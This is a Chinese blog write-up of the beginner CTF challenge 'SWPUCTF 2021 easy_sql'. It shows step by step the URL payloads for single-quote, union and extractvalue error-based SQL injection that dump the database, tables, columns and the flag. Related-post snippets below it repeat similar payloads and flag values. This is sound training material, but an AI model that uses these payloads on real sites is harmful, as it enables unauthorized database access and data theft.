[SWPUCTF 2021 新生赛]easy_sql

最新推荐文章于 2026-05-18 13:29:20 发布
原创 最新推荐文章于 2026-05-18 13:29:20 发布 · 539 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#sql #数据库

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看

又是一道经典杰哥SQL注入题

题目提示:参数是wllm

1、先判断闭合方式

/?wllm=1' //得到回显位是单引号

2、判断字段数

/?wllm=1' group by 3 --+ //经过尝试,发现字段数是3

3、判断回显位

/?wllm=1'  union select 1,2,3 --+ //原以为这个还是联合注入,但是发现根本没有回显,于是换一种思路,用报错注入试试

4.extractvalue报错注入

(1)已经知道了字段数,直接爆库名

?wllm=1'  union select  1,2,extractvalue(1,concat('~',(select database())))--+

得到库名test_db

(2)爆表名

/?wllm=1'  union select  1,2,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='test_db')))--+

得到表名test_tb和users,直接尝试找test_tb的字段名

(3)爆字段名

/?wllm=1'  union select  1,2,extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='test_tb')))--+

发现一个名为flag的字段名

(4)直接查看flag字段名的内容

/?wllm=1'  union select  1,2,extractvalue(1,concat('~',(select substring(group_concat(flag),1,30) from test_db.test_tb)))--+



/?wllm=1'  union select  1,2,extractvalue(1,concat('~',(select substring(group_concat(flag),31,30) from test_db.test_tb)))--+

substring一次只能回显30个字符,分两次查看

最后整理得到flag:NSSCTF{8ab46ee0-b0d3-4056-a62a

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

点击查看
F2586
关注
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 1473
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 1284
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
题目:[SWPUCTF 2021 新生]easy_sql
最新发布
2401_89883716的博客
05-18 25
本文记录了通过SQL注入获取flag的过程。首先发现参数为wllm,使用?wllm=1' order by 4 --+测试注入点。然后通过联合查询获取数据库名(test_db)和表名(test_tb,users)。接着查询test_tb表的列名,最后用?wllm=-1' union select 1,database(),group_concat(id,flag) from test_tb --+成功获取flag。整个过程展示了基本的SQL注入技术,包括信息收集和最终的数据提取。
[SWPUCTF 2021 新生]easy_sql SQL
2302_79359652的博客
03-13 1086
相关基础(主要在如何判断注入类型): sql注入的三种方式是什么-mysql教程-PHP中文网 注入原理: 是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 对数据库的注入利用方式: 查询数据 读写文件 执行命令 注入分类: 1. 数字型注入: 数字型注入——参数整型——数字型漏洞 假设存在一条url为:HTTP:
[SWPUCTF 2021 新生]easy_sql的WriteUp
2301_76435948的博客
10-22 3890
可以看到有列名为id,flag,说明flag极大可能在这个表中。一道简单的sql注入题,首先查看源代码,看看参数是啥。可知,我们需要用到参数wllm。3可以,4不行,说明字段数为3。先试试test_tb表。用wllm参数试一下。
NSSCTF练习记录:[SWPUCTF 2021 新生]easy_sql
qq_44396970的博客
07-31 416
3的时候正常回显,4的时候显示Unknown column ‘4’ in ‘order clause’,说明有3列数据。在回显位上,输入database和version查看数据库名和版本。显示出数据库test_db中所有的表名。判断回显位在222处和333处。查看test_tb表中的所有列。查看网页发现参数为wllm。
CTF刷题第一周
qq_62660611的博客
11-10 2065
第一周刷题记录
[SWPUCTF 2021 新生]sql
m0_70819573的博客
03-02 954
发现变量wllm,传入1‘发现报错,是sql注入,进行fuzz测试。1.打开环境,查看源代码。一个简单的python脚本。发现=和空格都被过滤了。3.mid函数的使用。
SWPUCTF 2021 新生 easy_sql
JasonJiao66的博客
01-28 670
当传1‘时出现报错,我们知道这是一个字符型注入,那么接下来还是先把句尾注释掉,然后使用order by语句,从1开始试,到4时开始报错,那么我们知道其有三个字段。首先打开题目,照片左上角求我们赶紧写一点东西,网站标题中则提升我们应该去传一个wllm的值,我们先给杰哥传一个1,回显正常。将1改为-1后,使用union selec,用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。
NSS [SWPUCTF 2021 新生]sql
Jay17的博客
10-26 988
NSS [SWPUCTF 2021 新生]sql
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 773
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值